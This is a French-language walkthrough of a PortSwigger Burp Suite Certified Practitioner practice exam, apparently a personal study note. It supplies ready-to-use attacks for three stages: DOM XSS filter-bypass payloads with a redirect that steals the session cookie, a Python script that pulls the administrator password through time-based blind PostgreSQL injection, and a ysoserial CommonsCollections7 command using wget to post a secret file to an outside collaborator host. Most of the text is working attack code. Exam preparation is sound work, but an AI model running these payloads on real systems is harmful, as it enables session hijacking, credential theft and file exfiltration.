WRITEUP : PRACTICE EXAM 2 (BSCP)

Practice Exam - Burp Suite Certified Practitioner | Web Security Academy - PortSwiggerWebSecAcademy

Vecteur : Injection de JavaScript dans le DOM via un paramètre de recherche (find). Défi : Présence de filtres/WAF limitant l'utilisation de certains caractères.

1. Analyse et Bypass

Après plusieurs tests pour échapper à la structure JSON/JavaScript existante :

"};alert`1`//
","a":alert1}//
"-alert`1`-"

2. Payload d'exfiltration

Le but est de rediriger l'administrateur vers notre serveur d'exploit en lui faisant porter son cookie de session.

Payload de redirection : "};location='https://[EXPLOIT-SERVER]/log?c='+document.cookie;//

"};location='https://exploit-0aa20067041b291b83a6ea7c0130006e.exploit-server.net/?c='+document.cookie;//

Exploit final (à délivrer via le serveur d'exploit) :

<script>
  location = "https://0a79004d04a329a7830bebde00dd0088.web-security-academy.net/?find=%22%7D%3Blocation%3D%27https%3A%2F%2Fexploit-0aa20067041b291b83a6ea7c0130006e.exploit-server.net%2F%3Fc%3D%27%2Bdocument.cookie%3B%2F%2F";
</script>

Stage 2: Privilege Escalation (SQLi Time-based)

Vecteur : Injection SQL dans le paramètre order de la recherche filtrée. Base de données : PostgreSQL.

1. Validation de l'injection

On confirme l'injection avec une condition simple qui ne casse pas le tri : ASC,(CASE WHEN (1=1) THEN 1 ELSE 2 END)

2. Automatisation de l'extraction (Blind SQLi)

Puisque l'application ne renvoie pas d'erreur directe avec le contenu, on utilise une attaque par temps (Time-based).

Logique du Payload : Le script vérifie caractère par caractère le mot de passe de administrator. Si le caractère est correct, la base de données attend 3 secondes (pg_sleep(3)).

Script Python d'extraction :

import requests
import time

url = "https://[LAB-ID].web-security-academy.net/filtered_search"
cookies = {"session": "your_session_id"}
charset = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""

for i in range(1, 21):
    for char in charset:
        # Payload PostgreSQL Time-based
        payload = f"ASC,(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username='administrator'),{i},1)='{char}') THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)"
        
        params = {"find": "", "organize": "5", "order": payload}
        
        start = time.time()
        requests.get(url, params=params, cookies=cookies)
        
        if (time.time() - start) >= 2.8:
            password += char
            print(f"[+] Lettre {i}: {char} -> {password}")
            break

Stage 3: File System Access (Java Deserialization)

Objectif : Lire le fichier /home/carlos/secret via une désérialisation non sécurisée.

Le cookie admin-prefs contient un objet Java sérialisé, compressé en Gzip et encodé en Base64.

Cookie: admin-prefs=H4sIAAAAAAAA%2fzWPPU7DQBCFF0RSQcMJpkOi2PTQEH4iCkcKClJEOV6Pk8HrHbO7dmKQOA4VJ%2bAI3IU7sBahm%2fn09PS9zx81Cl6dW8w1msjigjZS1%2bJ0IM9o%2bRVzS3pa1OwWnsrw9vUxDqvv7FAdZeq4xE48R5qJFFGdZs%2fY4cSiW0%2bW0bNbX2bq5D%2fz0EqkF%2fWuDvawHei1SLWHo7ih%2bi%2bxa6Iab5kc%2baiu5j04rAk4wA16KwHm4qL0qOFJWqjYWiqg7qHEVOE1JNMGPUEUKJh0VIvHDcGKcpg2jWWDw1K4R1ORPwvpcEWePC7gloORjgZ1SBDudo0VjsO7JDMI9zCzuA1JT3zaSb9PDWuHQgEAAA%3d%3d;

2. Génération du Payload (Ysoserial)

Dans ce second examen, la bibliothèque vulnérable identifiée est CommonsCollections7.

Commande de génération :

CommonsCollections7 '/usr/bin/wget --post-file /home/carlos/secret https://kpd4qvnp2c1ae8xbhncxyu0fl6rzfp3e.oastify.com'

3. Exécution

Procédure : Compresser le binaire en Gzip -> Encoder en Base64 -> Remplacer la valeur dans le cookie admin-prefs.

Mis à jour il y a 7 jours

hashtagStage 1: Initial Access (DOM XSS & Cookie Stealing)

hashtag1. Analyse et Bypass

hashtag2. Payload d'exfiltration

hashtagStage 2: Privilege Escalation (SQLi Time-based)

hashtag1. Validation de l'injection

hashtag2. Automatisation de l'extraction (Blind SQLi)

hashtagStage 3: File System Access (Java Deserialization)

hashtag1. Analyse du Cookie

hashtag2. Génération du Payload (Ysoserial)

hashtag3. Exécution

Stage 1: Initial Access (DOM XSS & Cookie Stealing)